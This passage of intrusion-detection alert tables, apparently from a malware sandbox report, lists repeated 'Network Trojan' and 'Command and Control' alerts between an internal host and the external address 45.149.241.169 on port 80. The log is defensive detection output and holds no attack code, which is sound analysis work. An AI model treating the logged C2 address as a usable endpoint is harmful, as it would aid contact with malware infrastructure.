2024-10-03T09:21:29.437160+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64382 | TCP |
2024-10-03T09:21:30.264753+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64383 | TCP |
2024-10-03T09:21:31.218885+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64384 | TCP |
2024-10-03T09:21:32.603314+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64385 | TCP |
2024-10-03T09:21:33.391128+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64386 | TCP |
2024-10-03T09:21:35.071057+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64387 | TCP |
2024-10-03T09:21:47.328778+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64389 | TCP |
2024-10-03T09:21:48.285934+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64390 | TCP |
2024-10-03T09:21:49.095497+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64391 | TCP |
2024-10-03T09:21:50.342633+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64392 | TCP |
2024-10-03T09:21:51.142841+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64393 | TCP |
2024-10-03T09:21:51.992201+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64394 | TCP |
2024-10-03T09:21:52.829891+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64395 | TCP |
2024-10-03T09:21:53.827051+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64396 | TCP |
2024-10-03T09:21:54.795139+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64397 | TCP |
2024-10-03T09:21:55.749129+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64398 | TCP |
2024-10-03T09:21:57.080376+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64399 | TCP |
2024-10-03T09:21:58.015493+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64400 | TCP |
2024-10-03T09:21:58.973834+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64401 | TCP |
2024-10-03T09:21:59.929539+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64402 | TCP |
2024-10-03T09:22:00.880849+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64403 | TCP |
2024-10-03T09:22:02.998303+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64404 | TCP |
2024-10-03T09:22:03.932185+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64405 | TCP |
2024-10-03T09:22:04.926899+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64406 | TCP |
2024-10-03T09:22:06.119391+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64407 | TCP |
2024-10-03T09:22:07.070496+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64408 | TCP |
2024-10-03T09:22:08.024007+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64409 | TCP |
2024-10-03T09:22:09.073052+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64410 | TCP |
2024-10-03T09:22:10.010284+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64411 | TCP |
2024-10-03T09:22:11.084543+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64412 | TCP |
2024-10-03T09:22:12.009694+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64413 | TCP |
2024-10-03T09:22:12.898558+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64414 | TCP |
2024-10-03T09:22:13.862095+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64415 | TCP |
2024-10-03T09:22:14.782651+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64416 | TCP |
2024-10-03T09:22:15.769373+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64417 | TCP |
2024-10-03T09:22:16.672757+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64418 | TCP |
2024-10-03T09:22:17.541317+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64419 | TCP |
2024-10-03T09:22:18.559915+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64420 | TCP |
2024-10-03T09:22:19.384819+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64421 | TCP |
2024-10-03T09:22:20.373252+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64422 | TCP |
2024-10-03T09:22:21.208335+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64423 | TCP |
2024-10-03T09:22:22.053825+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64424 | TCP |
2024-10-03T09:22:23.004091+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64425 | TCP |
2024-10-03T09:22:23.936122+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64426 | TCP |
2024-10-03T09:22:24.754606+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64427 | TCP |
2024-10-03T09:22:25.644791+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64428 | TCP |
2024-10-03T09:22:26.484271+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64429 | TCP |
2024-10-03T09:22:27.336837+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64430 | TCP |
2024-10-03T09:22:28.161528+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64431 | TCP |
2024-10-03T09:22:29.297417+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64432 | TCP |
2024-10-03T09:22:30.485332+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64433 | TCP |
2024-10-03T09:22:31.491241+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64434 | TCP |
2024-10-03T09:22:32.311823+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64435 | TCP |
2024-10-03T09:22:33.193006+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64436 | TCP |
2024-10-03T09:22:35.085142+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64438 | TCP |
2024-10-03T09:22:35.853534+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64439 | TCP |
2024-10-03T09:22:36.755143+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64440 | TCP |
2024-10-03T09:22:37.782566+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64441 | TCP |
2024-10-03T09:22:38.692949+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64442 | TCP |
2024-10-03T09:22:39.530058+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64443 | TCP |
2024-10-03T09:22:40.355345+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64444 | TCP |
2024-10-03T09:22:41.357295+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64445 | TCP |
2024-10-03T09:22:42.192690+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64446 | TCP |
2024-10-03T09:22:43.095306+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64447 | TCP |
2024-10-03T09:22:43.915998+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64448 | TCP |
2024-10-03T09:22:44.845008+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64449 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:51.444637+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.895647+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.154508+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.378201+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:57.546571+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.117485+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.355678+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.453898+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.292636+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.191952+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.262865+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.200763+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.209342+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.095755+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.058000+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.908970+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.839583+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.836642+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:11.918002+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.880481+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.766337+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.575323+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:15.899147+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.915649+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.866524+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.008215+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.428539+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.234810+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.090242+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.948484+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.875611+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.669335+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.688958+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.634586+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.548334+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.432337+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.259881+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.213756+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.591622+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.386243+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.070962+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.491936+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.323870+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.281112+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.089316+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.342573+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.138044+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.987281+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.824432+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:53.813148+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.779943+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.743930+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.049613+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.009483+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.968924+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.912717+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.875995+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:02.986735+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.927136+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.921954+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.114484+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.060441+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.996431+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.068231+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.004080+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.079290+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.003792+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.893575+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.853371+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.776328+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.764134+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.667875+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.525911+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.555021+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.379297+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.358626+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.203422+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.048862+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.910892+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.931318+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.748653+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.639024+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.473248+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.331889+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.156424+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.195837+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.480234+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.486447+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.303507+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.188157+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.292855+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.079411+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.848697+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.750157+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.777548+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.687921+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.523859+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.350489+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.352352+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.187830+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.088359+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.911035+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.840138+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:51.444637+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.895647+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.154508+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.378201+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:57.546571+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.117485+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.355678+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.453898+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.292636+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.191952+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.262865+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.200763+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.209342+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.095755+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.058000+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.908970+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.839583+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.836642+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:11.918002+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.880481+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.766337+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.575323+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
